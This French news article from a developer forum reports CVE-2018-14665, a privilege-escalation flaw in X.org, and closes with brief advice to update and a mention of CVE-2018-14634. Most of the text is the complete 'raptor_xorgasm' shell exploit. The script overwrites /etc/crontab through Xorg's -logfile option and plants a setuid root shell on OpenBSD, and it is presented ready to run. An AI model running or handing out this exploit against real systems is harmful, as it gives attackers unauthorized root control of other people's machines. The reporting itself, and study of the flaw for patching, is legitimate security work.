Une faille de sécurité dans X.org affecte les distributions Linux et BSD

Elle permet à un attaquant d'obtenir un accès root depuis un terminal

Le 27 octobre 2018, par sambia39, Membre expérimenté

Le noyau Linux est victime d’une nouvelle faille de sécurité CVE-2018-14665 donnant un accès root a des utilisateurs à travers des lignes de commande depuis un terminal.

Dans les faits, il suffit qu'une personne manipule les paquets X.org pour obtenir les droits super administrateurs à travers les commandes -modulepath et -logfile, explique Narendra Shinde, un chercheur en sécurité qui s’étonne même que personne ne se soit aperçu de la faille avant. Mais pour l’heure, il s’avère que cette faille n’est exploitable que sur le serveur dont X.Org est exécuté avec les droits root.

Code sh :

Sélectionner tout

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
 
 
#!/bin/sh 
 
 
 
 
 
# 
 
 
# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron 
 
 
# Copyright (c) 2018 Marco Ivaldi  
 
 
# 
 
 
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission  
 
 
# check for -modulepath and -logfile options when starting Xorg. X server  
 
 
# allows unprivileged users with the ability to log in to the system via  
 
 
# physical console to escalate their privileges and run arbitrary code under  
 
 
# root privileges (CVE-2018-14665). 
 
 
# 
 
 
# This exploit targets OpenBSD's cron in order to escalate privileges to 
 
 
# root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical 
 
 
# console, it works perfectly on pseudo-terminals connected via SSH as well. 
 
 
# 
 
 
# See also: 
 
 
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html 
 
 
# https://www.exploit-db.com/exploits/45697/ 
 
 
# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850 
 
 
# 
 
 
# Usage: 
 
 
# blobfish$ chmod +x raptor_xorgasm 
 
 
# blobfish$ ./raptor_xorgasm 
 
 
# [...] 
 
 
# Be patient for a couple of minutes... 
 
 
# [...] 
 
 
# Don't forget to cleanup and run crontab -e to reload the crontab. 
 
 
# -rw-r--r--  1 root  wheel  47327 Oct 27 14:48 /etc/crontab 
 
 
# -rwsrwxrwx  1 root  wheel  7417 Oct 27 14:50 /usr/local/bin/pwned 
 
 
# blobfish# id 
 
 
# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel) 
 
 
# 
 
 
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2): 
 
 
# OpenBSD 6.4 (Xorg 1.19.6) [tested] 
 
 
# OpenBSD 6.3 (Xorg 1.19.6) [tested] 
 
 
# 
 
 
 
 
 
echo "raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron" 
 
 
echo "Copyright (c) 2018 Marco Ivaldi " 
 
 
 
 
 
# prepare the payload 
 
 
cat << EOF > /tmp/xorgasm 
 
 
cp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available 
 
 
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c 
 
 
gcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid 
 
 
chmod 4777 /usr/local/bin/pwned 
 
 
EOF 
 
 
chmod +x /tmp/xorgasm 
 
 
 
 
 
# trigger the bug 
 
 
cd /etc 
 
 
Xorg -fp "* * * * * root /tmp/xorgasm" -logfile crontab :1 & 
 
 
sleep 5 
 
 
pkill Xorg 
 
 
 
 
 
# run the setuid shell 
 
 
echo 
 
 
echo "Be patient for a couple of minutes..." 
 
 
echo 
 
 
sleep 120 
 
 
echo 
 
 
echo "Don't forget to cleanup and run crontab -e to reload the crontab." 
 
 
ls -l /etc/crontab* 
 
 
ls -l /usr/local/bin/pwned 
 
 
/usr/local/bin/pwned

Diverses distributions telles qu'Ubuntu , Debian , Red Hat, CentOs, Fedora et OpenBSD sont vulnérables à ce genre d’attaque. Le déploiement d’un correctif serait en cours d’élaboration par les développeurs de X.Org. Pour l’instant, il est conseillé de vérifier que le paquet est à jour et de limiter l’accès au poste informatique.

Ceci étant, il faut tout de même être vigilant, car une autre vulnérabilité a été également découverte récemment (CVE-2018-14634), une faille de type « integer overflow » dans la fonction create_elf_tables () du noyau Linux : sur des systèmes 64 bits, permettant à un attaquant ou utilisateur local via des binaires SUID-root de devenir root sur la machine. Cette faille ne touche toutefois pas les machines disposant de moins de 32 Go de RAM, en raison des demandes de mémoire lors de l'exploitation. Ce problème n'affecte pas non plus les systèmes 32 bits, car ils ne disposent pas d'un espace d'adressage suffisant pour exploiter cette vulnérabilité.

Sources CVE-2018-14634 : Mutagen Astronomy: Integer overflow in Linux's create_elf_tables(), CVE-2018-14665 (GitHub), CVE-2018-14665 (Debian)

Qu'en pensez-vous ?

Vous avez aimé cette actualité ? Alors partagez-la avec vos amis en cliquant sur les boutons ci-dessous :

Une faille de sécurité dans X.org affecte les distributions Linux et BSD Elle permet à un attaquant d'obtenir un accès root depuis un terminal

Une faille de sécurité dans X.org affecte les distributions Linux et BSD

Elle permet à un attaquant d'obtenir un accès root depuis un terminal